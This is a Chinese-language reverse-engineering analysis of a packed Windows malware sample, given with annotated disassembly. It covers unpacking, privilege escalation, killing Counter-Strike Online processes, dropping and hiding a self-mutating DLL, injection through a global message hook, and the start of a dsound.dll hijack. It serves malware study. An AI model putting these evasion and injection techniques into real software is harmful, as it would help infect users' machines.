病毒汇编逆向分析实例赏析
?病毒名稱:??? xxmb??????????????????????????????????????????????????????????????
?殼信息:????? yoda's Protector v1.02 (.dll,.ocx) -> Ashkbiz Danehkar (h)
?威脅的系統:???????? windows????????????????????? ?
?相關漏洞:??????????? 無???????????????????????????
文件系統變化
生成如下文件:
C:\DOCUME~1\jack\LOCALS~1\Temp\kb712959.sve??? (Kb后面的數值名稱是隨機生成的)
C:\Program Files\Common Files\System\kb712959.dla????????? (由kb712959.sve拷貝得來的)
C:\WINDOWS\system32\dsound.dll
C:\WINDOWS\system32\dsound.dll.YUCH
C:\WINDOWS\system32\DllCache\dsound.dll
C:\WINDOWS\system32\DllCache\dsound.dll.YUCH
詳細分析/功能介紹
1.提升本進程權限,查看 "CSOLauncher.exe", "cstrike-online.exe"連個進程是否存在
首先PEID查殼 :發現入口RVA:1000?? .text段 ?
?但是顯示是?? yoda's Protector v1.02 (.dll,.ocx) -> Ashkbiz Danehkar 殼? 具體的看看,果然是在加殼之后,又改了入口。
00401000 >/$? B8 D507D0B0?? mov eax,0xB0D007D5
00401005? |?? B8 6FA04000?? mov eax,server.0040A06F
0040100A? |?? 8BC0????????? mov eax,eax
0040100C? |?? 8BD2????????? mov edx,edx?????????????????????? ;? ntdll.KiFastSystemCallRet
0040100E? |?? 55??????????? push ebp
0040100F? |?? 8BE9????????? mov ebp,ecx
00401011? |.? 5D??????????? pop ebp
00401012? |?? 50??????????? push eax
00401013? |?? 51??????????? push ecx
00401014? |?? 8BC8????????? mov ecx,eax
00401016? |.? 59??????????? pop ecx
00401017? |.? C3??????????? retn????????????????????????????? ;? 將0040A06F壓棧 使用retn指令 返回到40A06F處執行外殼程序
說以現在我們可以更改OEP為 A06F,,,,,然后再去看看可不可以脫殼。
可以看到外殼,使用esp定律就可以脫了
0040A06F >? 60????????????? pushad
0040A070??? 83EC 38???????? sub esp,0x38
0040A073??? 33C0??????????? xor eax,eax
0040A075??? C745 D8 4765745>mov dword ptr ss:[ebp-0x28],0x50746547
0040A07C??? C745 DC 726F634>mov dword ptr ss:[ebp-0x24],0x41636F72
0040A083??? C745 E0 6464726>mov dword ptr ss:[ebp-0x20],0x65726464
0040A08A??? C745 E4 7373000>mov dword ptr ss:[ebp-0x1C],0x7373
脫殼之后,可以再用PEID查看,是Microsoft Visual C++ 6.0寫的
004048B4 >/$? 55??????????? push ebp
004048B5? |.? 8BEC????????? mov ebp,esp
004048B7? |.? 6A FF???????? push -0x1
004048B9? |.? 68 E8504000?? push Cracker.004050E8
004048BE? |.? 68 20484000?? push <jmp.&MSVCRT._except_handler3>??????? ;? SE 處理程序安裝
004048C3? |.? 64:A1 0000000>mov eax,dword ptr fs:[0]
004048C9? |.? 50??????????? push eax
接下來進入正題了:
單步到
0040382F? call 00402B29 跟進
00402BF8? |.? C645 E9 65??? mov byte ptr ss:[ebp-0x17],0x65
00402BFC? |.? C645 EA 67??? mov byte ptr ss:[ebp-0x16],0x67
00402C00? |.? C645 EB 65??? mov byte ptr ss:[ebp-0x15],0x65????????? ;? SeDebugPrivileg, cstrike-online.exe, CSOLauncher
00402C04? |.? E8 26E8FFFF?? call Cracker.0040142F??????????????????? ;? 提升本進程權限
00402C09? |.? 8D45 F0?????? lea eax,[local.4]
00402C0C? |.? 50??????????? push eax???????????????????????????????? ;? CSOLauncher.exe
00402C0D? |.? E8 73E6FFFF?? call Cracker.00401285
00402C12? |.? 8D45 C8?????? lea eax,[local.14]
00402C15? |.? 50??????????? push eax???????????????????????????????? ;?? "cstrike-online.exe"
00402C16? |.? E8 6AE6FFFF?? call Cracker.00401285
跟進40142F看下
0040146F? |.? C645 FA 6C??? mov byte ptr ss:[ebp-0x6],0x6C?????????? ; |
00401473? |.? C645 FB 6C??? mov byte ptr ss:[ebp-0x5],0x6C?????????? ; |Advapi.dll
00401477? |.? 885D FC?????? mov byte ptr ss:[ebp-0x4],bl???????????? ; |
0040147A? |.? FFD6????????? call esi???????????????????????????????? ; \LoadLibraryA
00401558? |.? C645 A8 6C??? mov byte ptr ss:[ebp-0x58],0x6C
0040155C? |.? C645 A9 65??? mov byte ptr ss:[ebp-0x57],0x65
00401560? |.? C645 AA 67??? mov byte ptr ss:[ebp-0x56],0x67
00401564? |.? C645 AB 65??? mov byte ptr ss:[ebp-0x55],0x65
00401568? |.? 8D45 DC?????? lea eax,[local.9]
0040156B? |.? C645 AC 73??? mov byte ptr ss:[ebp-0x54],0x73????????? ;? OpenProcessToken, LookupPrivilegeVauleA, AdjustTokenPrivilege
0040156F? |.? 50??????????? push eax????? ;“FuncName”
00401570? |.? 57??????????? push edi?????? ;hModuleDll
00401571? |.? 885D AD?????? mov byte ptr ss:[ebp-0x53],bl
00401574? |.? E8 A7030000?? call Cracker.00401920
大家可以跟進401920看看?? 使用模塊句柄,與函數名查找,導出表地址
然后在kernel32.dll中得到CloseHandle,GetCurrentProcess兩個進程
GetCurrentProcess---->OpenProcessToken----->LookupPrivilegeValueA---->AdjustTokenPrivileges---->CloseHandle
00401610? |.? FFD0????????? call eax???????????????????????????????? ;? GetCurrentProcess
00401612? |.? 50??????????? push eax
00401613? |.? FF55 88?????? call [local.30]????????????????????????? ;? OpenProcessToken
00401616? |.? 85C0????????? test eax,eax
00401618? |.? 74 5C???????? je XCracker.00401676
0040161A? |.? 8D85 7CFFFFFF lea eax,[local.33]
00401620? |.? 50??????????? push eax
00401621? |.? FF75 08?????? push [arg.1]
00401624? |.? 53??????????? push ebx
00401625? |.? FF55 8C?????? call [local.29]????????????????????????? ;? LookupprivilegeValueA
00401628? |.? 85C0????????? test eax,eax
0040165F? |.? 53??????????? push ebx
00401660? |.? 50??????????? push eax
00401661? |.? 53??????????? push ebx
00401662? |.? 89B5 6CFFFFFF mov [local.37],esi
00401668? |.? FF75 94?????? push [local.27]
0040166B? |.? FF55 84?????? call [local.31]????????????????????????? ;? AdjustTokenPrivileges
跟進call Cracker.00401285
調用LoadLibraryA加載kernel32.dll,然后得到CreateToolhelp32Snapshot,Process32First,Process32Next,然
后查找CSOLauncher.exe,cstrike-online.exe進程,如果找到結束該進程。
對應代碼
004013C7? |.? FFD3????????? call ebx???????????????????????????????? ;? CreateToolhelp32Snapshot
004013C9? |.? 8BD8????????? mov ebx,eax
004013CB? |.? EB 03???????? jmp XCracker.004013D0
004013CD? |>? 8B5D 08?????? mov ebx,[arg.1]
004013D0? |>? 83FB FF?????? cmp ebx,-0x1
004013D3? |.? 75 04???????? jnz XCracker.004013D9
004013D5? |.? 33C0????????? xor eax,eax
004013D7? |.? EB 51???????? jmp XCracker.0040142A
004013D9? |>? 8D85 94FEFFFF lea eax,[local.91]
004013DF? |.? C785 94FEFFFF>mov [local.91],0x128
004013E9? |.? 50??????????? push eax
004013EA? |.? 53??????????? push ebx
004013EB? |.? FF55 BC?????? call [local.17]????????????????????????? ;? Process32First
004013EE? |.? 85C0????????? test eax,eax
004013F0? |.? 74 33???????? je XCracker.00401425
004013F2? |>? 8D85 B8FEFFFF /lea eax,[local.82]
004013F8? |.? 50??????????? |push eax
004013F9? |.? FF75 08?????? |push [arg.1]??????????????????????????? ;? 進程名
004013FC? |.? E8 CA020000?? |call Cracker.004016CB?????????????????? ;? 相當于strcmp
00401401? |.? 59??????????? |pop ecx
00401402? |.? 85C0????????? |test eax,eax
00401404? |.? 59??????????? |pop ecx
00401405? |.? 75 0C???????? |jnz XCracker.00401413
00401407? |.? FFB5 9CFEFFFF |push [local.89]???????????????????????? ;? 進程PID
0040140D? |.? E8 8DFDFFFF?? |call Cracker.0040119F?????????????????? ;? OpenProcess TerminateProcess
00401412? |.? 59??????????? |pop ecx???????????????????????????????? ;? ntdll.7C92F641
00401413? |>? 8D85 94FEFFFF |lea eax,[local.91]
00401419? |.? 50??????????? |push eax
0040141A? |.? 53??????????? |push ebx
0040141B? |.? FF55 C0?????? |call [local.16]???????????????????????? ;? Process32Next
0040141E? |.? 85C0????????? |test eax,eax
00401420? |.^ 75 D0???????? \jnz XCracker.004013F2
2.將資源寫入臨時文件C:\DOCUME~1\jack\LOCALS~1\Temp\kb******.sve(******是一串隨機數),拷貝變型了的臨時文件到 C:\Program Files\Common Files\System\kd******.dla, 并將文件屬性設置為隱藏
00403840? |.? 8BF8????????? mov edi,eax
00403842? |.? 56??????????? push esi???????????????????????????????? ; /n
00403843? |.? 6A 00???????? push 0x0???????????????????????????????? ; |c = 00
00403845? |.? 57??????????? push edi???????????????????????????????? ; |s
00403846? |.? E8 E70F0000?? call <jmp.&MSVCRT.memset>??????????????? ; \memset
0040384B? |.? 6A 00???????? push 0x0
0040384D? |.? 57??????????? push edi
0040384E? |.? 6A 06???????? push 0x6
00403850? |.? E8 F7F3FFFF?? call Cracker.00402C4C
跟進關鍵call? 402C4C
00402D35? |.? C645 88 53??? mov byte ptr ss:[ebp-0x78],0x53????????? ;? copyfile
00402D39? |.? AA??????????? stos byte ptr es:[edi]
00402D3A? |.? C645 89 4F??? mov byte ptr ss:[ebp-0x77],0x4F
00402D3E? |.? C645 8A 46??? mov byte ptr ss:[ebp-0x76],0x46
00402D42? |.? C645 8B 54??? mov byte ptr ss:[ebp-0x75],0x54
00402D46? |.? C645 8C 57??? mov byte ptr ss:[ebp-0x74],0x57
00402D4A? |.? C645 8D 41??? mov byte ptr ss:[ebp-0x73],0x41
00402D4E? |.? C645 8E 52??? mov byte ptr ss:[ebp-0x72],0x52
00402D52? |.? C645 8F 45??? mov byte ptr ss:[ebp-0x71],0x45
00402D56? |.? C645 90 5C??? mov byte ptr ss:[ebp-0x70],0x5C
00402D5A? |.? C645 91 41??? mov byte ptr ss:[ebp-0x6F],0x41
00402D5E? |.? 8B7D 0C?????? mov edi,[arg.2]????????????????????????? ;? 堆首地址
00402D61? |.? 8065 9F 00??? and byte ptr ss:[ebp-0x61],0x0
00402D65? |.? 8065 CE 00??? and byte ptr ss:[ebp-0x32],0x0
00402D69? |.? 8065 CF 00??? and byte ptr ss:[ebp-0x31],0x0
00402D6D? |.? 8065 BD 00??? and byte ptr ss:[ebp-0x43],0x0
00402D71? |.? 8D45 B8?????? lea eax,[local.18]
00402D74? |.? 6A 76???????? push 0x76
00402D76? |.? 50??????????? push eax
00402D77? |.? 57??????????? push edi
00402D78? |.? C645 92 68??? mov byte ptr ss:[ebp-0x6E],0x68
00402D7C? |.? C645 93 6E??? mov byte ptr ss:[ebp-0x6D],0x6E
00402D80? |.? C645 94 4C??? mov byte ptr ss:[ebp-0x6C],0x4C
00402D84? |.? C645 95 61??? mov byte ptr ss:[ebp-0x6B],0x61
00402D88? |.? C645 96 62??? mov byte ptr ss:[ebp-0x6A],0x62
00402D8C? |.? C645 97 5C??? mov byte ptr ss:[ebp-0x69],0x5C
00402D90? |.? C645 98 48??? mov byte ptr ss:[ebp-0x68],0x48
00402D94? |.? C645 99 53??? mov byte ptr ss:[ebp-0x67],0x53
00402D98? |.? C645 9A 68??? mov byte ptr ss:[ebp-0x66],0x68
00402D9C? |.? C645 9B 69??? mov byte ptr ss:[ebp-0x65],0x69
00402DA0? |.? C645 9C 65??? mov byte ptr ss:[ebp-0x64],0x65
00402DA4? |.? C645 9D 6C??? mov byte ptr ss:[ebp-0x63],0x6C
00402DA8? |.? C645 9E 64??? mov byte ptr ss:[ebp-0x62],0x64????????? ;? SOFTWARE\AhnLad\HShield
00402DAC? |.? C645 B8 6D??? mov byte ptr ss:[ebp-0x48],0x6D
00402DB0? |.? C645 B9 73??? mov byte ptr ss:[ebp-0x47],0x73
00402DB4? |.? C645 BA 63??? mov byte ptr ss:[ebp-0x46],0x63
00402DB8? |.? C645 BB 72??? mov byte ptr ss:[ebp-0x45],0x72
00402DBC? |.? C645 BC 6F??? mov byte ptr ss:[ebp-0x44],0x6F????????? ;? mscro
00402DC0? |.? E8 C9F7FFFF?? call Cracker.0040258E
這個call,將資源寫入臨時文件C:\DOCUME~1\jack\LOCALS~1\Temp\kb******.sve(******是一串隨機數)
首先
004025FE? |.? 885D C8?????? mov byte ptr ss:[ebp-0x38],bl??????????? ;? GetTempPathA
00402601? |.? E8 1AF3FFFF?? call Cracker.00401920
00402606? |.? 59??????????? pop ecx
00402607? |.? 59??????????? pop ecx
00402608? |.? 8D8D 60FEFFFF lea ecx,[local.104]
0040260E? |.? 51??????????? push ecx???????????????????????????????? ;? 存放臨時文件路進
0040260F? |.? 68 04010000?? push 0x104
00402614? |.? FFD0????????? call eax???????????????????????????????? ;? GetTempPathA? 創建臨時文件
00402616? |.? 85C0????????? test eax,eax
然后使用相同的方式得到FindResource--->LoadResource--->SizeOfResource->LockResource->FreeResource
就下來是? 使用time() 產生一個種子,隨機生成6個字符的字符串? 構成kb******.sve
00402789? |.? FF15 98504000 call dword ptr ds:[<&MSVCRT.time>]?????? ; \time
0040278F? |.? 50??????????? push eax???????????????????????????????? ; /seed
00402790? |.? FF15 94504000 call dword ptr ds:[<&MSVCRT.srand>]????? ; \srand
00402796? |.? 83C4 30?????? add esp,0x30
00402799? |.? 6A 02???????? push 0x2
0040279B? |.? 5F??????????? pop edi
0040279C? |>? FF15 90504000 /call dword ptr ds:[<&MSVCRT.rand>]????? ; [rand
004027A2? |.? 6A 0A???????? |push 0xA
004027A4? |.? 99??????????? |cdq
004027A5? |.? 59??????????? |pop ecx
004027A6? |.? F7F9????????? |idiv ecx
004027A8? |.? 80C2 30?????? |add dl,0x30
004027AB? |.? 88943D 64FFFF>|mov byte ptr ss:[ebp+edi-0x9C],dl
004027B2? |.? 47??????????? |inc edi
004027B3? |.? 83FF 08?????? |cmp edi,0x8???????????????????????????? ;? while(edi < 0x8)
004027B6? |.^ 7C E4???????? \jl XCracker.0040279C
004027B8? |.? C6843D 64FFFF>mov byte ptr ss:[ebp+edi-0x9C],0x2E
004027C0? |.? 47??????????? inc edi
004027C1? |.? 8D85 64FFFFFF lea eax,[local.39]
004027C7? |.? C6843D 64FFFF>mov byte ptr ss:[ebp+edi-0x9C],0x73
004027CF? |.? 47??????????? inc edi
004027D0? |.? 50??????????? push eax
004027D1? |.? 8D85 60FEFFFF lea eax,[local.104]
004027D7? |.? C6843D 64FFFF>mov byte ptr ss:[ebp+edi-0x9C],0x76
004027E0? |.? 50??????????? push eax???????????????????????????????? ;? 臨時文件路徑
004027E1? |.? C6843D 64FFFF>mov byte ptr ss:[ebp+edi-0x9C],0x65
004027E9? |.? 889C3D 65FFFF>mov byte ptr ss:[ebp+edi-0x9B],bl
004027F0? |.? E8 A5EFFFFF?? call Cracker.0040179A??????????????????? ;? strcat
004027F5? |.? 8D85 60FEFFFF lea eax,[local.104]
004027FB? |.? 50??????????? push eax???????????????????????????????? ;? C:\DOCUME~1\jack\LOCALS~1\Temp\kb420995.sve
004027FC? |.? FF75 08?????? push [arg.1]???????????????????????????? ;? 堆首地址
004027FF? |.? E8 9FEEFFFF?? call Cracker.004016A3??????????????????? ;? 將生成路徑名拷貝到堆區
0040280A? |.? 53??????????? push ebx???????????????????????????????? ; /pModule
0040280B? |.? FF15 04504000 call dword ptr ds:[<&kernel32.GetModuleH>; \GetModuleHandleA
00402811? |.? FF75 0C?????? push [arg.2]???????????????????????????? ;? mscro? (自己指定的資源類型)
00402814? |.? 8BF8????????? mov edi,eax
00402816? |.? FF75 10?????? push [arg.3]???????????????????????????? ;? 資源ID = 76
00402819? |.? 57??????????? push edi
0040281A? |.? FF55 84?????? call [local.31]????????????????????????? ;? FindResoureA 定位所指定的資源
0040281D? |.? 8945 08?????? mov [arg.1],eax????????????????????????? ;? HRSRC
00402820? |.? 50??????????? push eax
00402821? |.? 58??????????? pop eax
00402822? |.? 395D 08?????? cmp [arg.1],ebx
00402825? |.? 0F84 9B000000 je Cracker.004028C6
0040282B? |.? FF75 08?????? push [arg.1]???????????????????????????? ;? HRSRC
0040282E? |.? 57??????????? push edi???????????????????????????????? ;? hModule
0040282F? |.? FF55 88?????? call [local.30]????????????????????????? ;? LoadResource? 加載指定資源到內存
00402832? |.? 3BC3????????? cmp eax,ebx????????????????????????????? ;? 407070? 是? 指向資源數據的內存指針
0040284F? |.? 57??????????? push edi
00402850? |.? FF55 98?????? call [local.26]????????????????????????? ;? SizeOfResource? 得到資源大小
00402853? |.? BF 10604000?? mov edi,Cracker.00406010???????????????? ;? ASCII "Kernel32.dll"
00402858? |.? 68 44604000?? push Cracker.00406044??????????????????? ;? ASCII "CreateFileA"
0040285D? |.? 57??????????? push edi
0040285E? |.? 8945 98?????? mov [local.26],eax?????????????????????? ;? 【local.26】 = 2800? 資源大小
00402861? |.? FFD6????????? call esi
00402863? |.? 50??????????? push eax
00402864? |.? E8 B7F0FFFF?? call Cracker.00401920
00402869? |.? 59??????????? pop ecx
0040286A? |.? 8945 08?????? mov [arg.1],eax????????????????????????? ;? CreateFile
0040286D? |.? 59??????????? pop ecx
0040286E? |.? 68 50604000?? push Cracker.00406050??????????????????? ;? ASCII "CloseHandle"
00402873? |.? 57??????????? push edi
00402874? |.? FFD6????????? call esi
00402876? |.? 50??????????? push eax
00402877? |.? E8 A4F0FFFF?? call Cracker.00401920
0040287C? |.? 59??????????? pop ecx
0040287D? |.? 8945 0C?????? mov [arg.2],eax
00402880? |.? 59??????????? pop ecx
00402881? |.? 8D85 60FEFFFF lea eax,[local.104]
00402887? |.? 53??????????? push ebx
00402888? |.? 53??????????? push ebx
00402889? |.? 6A 02???????? push 0x2
0040288B? |.? 53??????????? push ebx
0040288C? |.? 53??????????? push ebx
0040288D? |.? 68 000000C0?? push 0xC0000000
00402892? |.? 50??????????? push eax???????????????????????????????? ;? C:\DOCUME~1\jack\LOCALS~1\Temp\kb420995.sve
00402893? |.? FF55 08?????? call [arg.1]???????????????????????????? ;? CreateFile
00402896? |.? 8BF0????????? mov esi,eax
00402898? |.? 83FE FF?????? cmp esi,-0x1
0040289B? |.? 0F84 A4000000 je Cracker.00402945
004028A1? |.? 8D45 FC?????? lea eax,[local.1]
004028A4? |.? 53??????????? push ebx???????????????????????????????? ; /pOverlapped
004028A5? |.? 50??????????? push eax???????????????????????????????? ; |pBytesWritten
004028A6? |.? 8B3D 1C504000 mov edi,dword ptr ds:[<&kernel32.WriteFi>; |kernel32.WriteFile
004028AC? |.? FF75 98?????? push [local.26]????????????????????????? ; |SizeOfResorce 返回值 = 0x2800
004028AF? |.? FF75 94?????? push [local.27]????????????????????????? ; |Buffer = 407070? 指向資源指針
004028B2? |.? 56??????????? push esi???????????????????????????????? ; |hFile 臨時文件句柄
004028B3? |.? FFD7????????? call edi???????????????????????????????? ; \WriteFile
00402DCD? |.? E8 85FBFFFF?? call Cracker.00402957???????????????????????????????? ;? 打開母本讀取母本后兩雙字,在臨時文件末尾追加隨機數據,之后將母本讀出雙字寫入臨時文件。目的變型文件,以至每次運行不一樣。大家可以跟進去看看
接下來時對注冊表操作
00402E36? |.? C645 A7 2E??? mov byte ptr ss:[ebp-0x59],0x2E
00402E3A? |.? C645 A8 62??? mov byte ptr ss:[ebp-0x58],0x62
00402E3E? |.? C645 A9 65??? mov byte ptr ss:[ebp-0x57],0x65
00402E42? |.? C645 AA 74??? mov byte ptr ss:[ebp-0x56],0x74?????????????????????? ;? SOFTWORE\Ahnlad\HShield.dbghelp.bet
00402E46? |.? E8 57F0FFFF?? call Cracker.00401EA2
跟進call 401EA2
00401EB3? |.? FF75 08?????? push [arg.1]
00401EB6? |.? E8 06FCFFFF?? call Cracker.00401AC1???????????????????????????????? ;? RegOpenKeyExA 打開子鍵 SOFTWORE\Ahnlad\HShield 會打開失敗? 大家可以跟進去看看
00401F84? |.? C645 D1 68??? mov byte ptr ss:[ebp-0x2F],0x68?????????????????????? ; |
00401F88? |.? C645 D2 65??? mov byte ptr ss:[ebp-0x2E],0x65?????????????????????? ; |Software\Microsoft\windows\ShellNoRoam\MUICache
00401F8C? |.? 885D D3?????? mov byte ptr ss:[ebp-0x2D],bl???????????????????????? ; |
00401F8F? |.? C645 E4 41??? mov byte ptr ss:[ebp-0x1C],0x41?????????????????????? ; |
00401F93? |.? C645 E5 64??? mov byte ptr ss:[ebp-0x1B],0x64?????????????????????? ; |
00401F97? |.? C645 E6 76??? mov byte ptr ss:[ebp-0x1A],0x76?????????????????????? ; |
00401F9B? |.? C645 E7 61??? mov byte ptr ss:[ebp-0x19],0x61?????????????????????? ; |
00401F9F? |.? C645 E8 70??? mov byte ptr ss:[ebp-0x18],0x70?????????????????????? ; |
00401FA3? |.? C645 E9 69??? mov byte ptr ss:[ebp-0x17],0x69?????????????????????? ; |
00401FA7? |.? C645 EA 33??? mov byte ptr ss:[ebp-0x16],0x33?????????????????????? ; |
00401FAB? |.? C645 EB 32??? mov byte ptr ss:[ebp-0x15],0x32?????????????????????? ; |
00401FAF? |.? C645 EC 2E??? mov byte ptr ss:[ebp-0x14],0x2E?????????????????????? ; |
00401FB3? |.? C645 ED 64??? mov byte ptr ss:[ebp-0x13],0x64?????????????????????? ; |
00401FB7? |.? C645 EE 6C??? mov byte ptr ss:[ebp-0x12],0x6C?????????????????????? ; |
00401FBB? |.? C645 EF 6C??? mov byte ptr ss:[ebp-0x11],0x6C?????????????????????? ; |Avdapi32.dll
00401FBF? |.? 885D F0?????? mov byte ptr ss:[ebp-0x10],bl???????????????????????? ; |
00401FC2? |.? FF15 00504000 call dword ptr ds:[<&kernel32.LoadLibraryA>]????????? ; \LoadLibraryA
00401FC8? |.? 8BF0????????? mov esi,eax
00401FCA? |.? 3BF3????????? cmp esi,ebx
00401FCC? |.? 0F84 BB000000 je Cracker.0040208D
00401FD2? |.? 8D45 D4?????? lea eax,[local.11]
00401FD5? |.? 57??????????? push edi????????????????????????????????????????????? ;? 臨時文件
0040203B? |.? 885D FF?????? mov byte ptr ss:[ebp-0x1],bl
0040203E? |.? E8 DDF8FFFF?? call Cracker.00401920
00402043? |.? 8BF8????????? mov edi,eax?????????????????????????????????????????? ;? edi = RegOpenKeyExA
00402045? |.? 8D45 F4?????? lea eax,[local.3]
00402048? |.? 50??????????? push eax
00402049? |.? 56??????????? push esi
0040204A? |.? E8 D1F8FFFF?? call Cracker.00401920
0040204F? |.? 83C4 10?????? add esp,0x10
00402052? |.? 8BF0????????? mov esi,eax?????????????????????????????????????????? ;? esi = RegCloseKey
00402054? |.? 8D45 14?????? lea eax,[arg.4]
00402057? |.? 50??????????? push eax
00402058? |.? 68 19000200?? push 0x20019
0040205D? |.? 8D45 A4?????? lea eax,[local.23]
00402060? |.? 53??????????? push ebx
00402061? |.? 50??????????? push eax????????????????????????????????????????????? ;? Software\Microsoft\windows\ShellNoRoam\MUICache
00402062? |.? 68 01000080?? push 0x80000001?????????????????????????????????????? ;? HKEY_CURRENT_USER
00402067? |.? FFD7????????? call edi????????????????????????????????????????????? ;? RegOpenKeyExA
00402069? |.? 85C0????????? test eax,eax????????????????????????????????????????? ;? if(iRet==ERROR_SUCCESS)
0040206B? |.? 5F??????????? pop edi
0040206C? |.? 75 11???????? jnz XCracker.0040207F
0040206E? |.? FF75 18?????? push [arg.5]????????????????????????????????????????? ;? 打開子鍵成功
00402071? |.? FF75 14?????? push [arg.4]
00402074? |.? FF75 08?????? push [arg.1]
00402077? |.? E8 4CFCFFFF?? call Cracker.00401CC8
咦咦沒有改注冊表啊,,,??? 繼續吧
接下來拷貝變型了的臨時文件到 C:\Program Files\Common Files\System\kd******.dla, 并將文件屬性設置為隱藏
0040318B? |.? C645 D5 65??? mov byte ptr ss:[ebp-0x2B],0x65
0040318F? |.? C645 D6 6D??? mov byte ptr ss:[ebp-0x2A],0x6D?????????????????????? ;? \System
00403193? |.? E8 E3E4FFFF?? call Cracker.0040167B
00403198? |.? 8BF8????????? mov edi,eax
0040319A? |.? 47??????????? inc edi
0040319B? |.? 57??????????? push edi????????????????????????????????????????????? ;? kb******.sve
0040319C? |.? E8 E3E5FFFF?? call Cracker.00401784???????????????????????????????? ;? strlen
004031A1? |.? 83E8 03?????? sub eax,0x3
004031A4? |.? 50??????????? push eax????????????????????????????????????????????? ; /maxlen
004031A5? |.? 8D85 4CFFFFFF lea eax,[local.45]??????????????????????????????????? ; |復制kd******.
004031AB? |.? 57??????????? push edi????????????????????????????????????????????? ; |src
004031AC? |.? 50??????????? push eax????????????????????????????????????????????? ; |dest
004031AD? |.? FF15 9C504000 call dword ptr ds:[<&MSVCRT.strncpy>]???????????????? ; \strncpy
004031B3? |.? 8D85 4CFFFFFF lea eax,[local.45]
004031B9? |.? 68 7C604000?? push Cracker.0040607C???????????????????????????????? ;? ASCII "dla"
004031BE? |.? 50??????????? push eax????????????????????????????????????????????? ;? kd******.
004031BF? |.? E8 D6E5FFFF?? call Cracker.0040179A???????????????????????????????? ;? strcat
004031C4? |.? 8D85 4CFFFFFF lea eax,[local.45]
004031CA? |.? 50??????????? push eax????????????????????????????????????????????? ;? kd******.dla
004031CB? |.? 8D85 B8F9FFFF lea eax,[local.402]
004031D1? |.? 50??????????? push eax
004031D2? |.? E8 CCE4FFFF?? call Cracker.004016A3???????????????????????????????? ;? memcpy(12F8B0, "kd******.dla")
00403261? |.? 8D85 B8F9FFFF lea eax,[local.402]
00403267? |.? 50??????????? push eax??????????????????????????????????????? ;? ke******.dla
00403268? |.? 8D85 48FEFFFF lea eax,[local.110]
0040326E? |.? 50??????????? push eax
0040326F? |.? E8 26E5FFFF?? call Cracker.0040179A?????????????????????????? ;? strcat
00403274? |.? 83C4 18?????? add esp,0x18
00403277? |>? 8D85 48FEFFFF lea eax,[local.110]???????????????????????????? ;? C:\Program File\Common Files\Common Filesa\System\ke******.dla
0040327D? |.? 50??????????? push eax
0040327E? |.? E8 01E5FFFF?? call Cracker.00401784?????????????????????????? ;? strlen
00403283? |.? 85C0????????? test eax,eax
00403285? |.? 59??????????? pop ecx
00403286? |.? 0F84 35010000 je Cracker.004033C1
0040328C? |.? 8D85 48FEFFFF lea eax,[local.110]
00403292? |.? 68 80000000?? push 0x80?????????????????????????????????????? ; /FileAttributes = NORMAL
00403297? |.? 50??????????? push eax??????????????????????????????????????? ; |FileName
00403298? |.? FF15 24504000 call dword ptr ds:[<&kernel32.SetFileAttributes>; \SetFileAttributesA
0040329E? |.? 8D85 48FEFFFF lea eax,[local.110]
004032A4? |.? 6A 00???????? push 0x0
004032A6? |.? 50??????????? push eax??????????????????????????????????????? ;? C:\Program File\Common Files\Common Filesa\System\ke******.dla
004032A7? |.? FF75 0C?????? push [arg.2]??????????????????????????????????? ;? 臨時文件路徑
004032AA? |.? FF55 C4?????? call [local.15]???????????????????????????????? ;? copyfile
0040336C? |.? 8BD8????????? mov ebx,eax???????????????????????????????????? ;? ebx = SetFIleAttributes
0040336E? |.? 59??????????? pop ecx
0040336F? |.? 8D85 48FEFFFF lea eax,[local.110]
00403375? |.? 50??????????? push eax??????????????????????????????????????? ;? C:\Program File\Common Files\Common Filesa\System\ke******.dla
00403376? |.? FFD7????????? call edi??????????????????????????????????????? ;? edi = GetFileAttributesA,
00403378? |.? 0C 02???????? or al,0x2?????????????????????????????????????? ;? 與上 FILE_ATTRIBUTE_HIDDEN
0040337A? |.? 50??????????? push eax
0040337B? |.? 8D85 48FEFFFF lea eax,[local.110]
00403381? |.? 50??????????? push eax
00403382? |.? FFD3????????? call ebx??????????????????????????????????????? ;? SetFIleAttributes? 隱藏文件
3.? 加載臨時文件, 獲取他的導出函數LoadDll, 然后調用LoadDll安全全局鉤子(鉤子類型WH_GETMESSAGE)
0040339F? |.? C645 C5 6C??? mov byte ptr ss:[ebp-0x3B],0x6C
004033A3? |.? C645 C6 6C??? mov byte ptr ss:[ebp-0x3A],0x6C???????????????? ;? LoadDll
004033A7? |.? FFD6????????? call esi??????????????????????????????????????? ;? LoadLibrary (加載臨時文件)
004033A9? |.? 8D4D C0?????? lea ecx,[local.16]
004033AC? |.? 51??????????? push ecx??????????????????????????????????????? ;? LoadDll
004033AD? |.? 50??????????? push eax??????????????????????????????????????? ;? hModule
004033AE? |.? E8 6DE5FFFF?? call Cracker.00401920
004033B3? |.? 59??????????? pop ecx
004033B4? |.? 59??????????? pop ecx
004033B5? |.? 85C0????????? test eax,eax
004033B7? |.? 74 08???????? je XCracker.004033C1
004033B9? |.? FFD0????????? call eax??????????????????????????????????????? ;? LoadDll 導出函數
跟進? call eax
發現安裝WH_GETMESSAGE類型的全局鉤子,在回調函數里都沒做,說明這個導出函數目的就是讓任何線程調用GetMessage或PeekMessage時加載這個dll,,,,?? 感覺這個dll里面很邪惡。
10002082??? FF7424 0C?????? push dword ptr ss:[esp+0xC]
10002086??? FF7424 0C?????? push dword ptr ss:[esp+0xC]
1000208A??? FF7424 0C?????? push dword ptr ss:[esp+0xC]
1000208E??? FF35 00600010?? push dword ptr ds:[0x10006000]
10002094??? FF15 DC400010?? call dword ptr ds:[0x100040DC]????????????????? ; USER32.CallNextHookEx
1000209A??? C2 0C00???????? retn 0xC
1000209D >? 6A 00?????????? push 0x0??????????????????????????????????????? ; 0 全局鉤子
1000209F??? FF35 00530010?? push dword ptr ds:[0x10005300]????????????????? ; kb372004.10000000
100020A5??? 68 82200010???? push kb372004.10002082????????????????????????? ; Hook_CallBack
100020AA??? 6A 03?????????? push 0x3??????????????????????????????????????? ; WH_GETMESSAGE
100020AC??? FF15 D8400010?? call dword ptr ds:[0x100040D8]????????????????? ; USER32.SetWindowsHookExA
100020B2??? A3 00600010???? mov dword ptr ds:[0x10006000],eax
100020B7??? C3????????????? retn
100020B8 >? FF35 00600010?? push dword ptr ds:[0x10006000]
100020BE??? FF15 D4400010?? call dword ptr ds:[0x100040D4]????????????????? ; USER32.UnhookWindowsHookEx
100020C4??? C3????????????? retn
4.? 判斷C:\windows\system32\dsound.dll文件是都存在,存在就拷貝一份,命名為C:\windows\system32\dsound.dll.dat
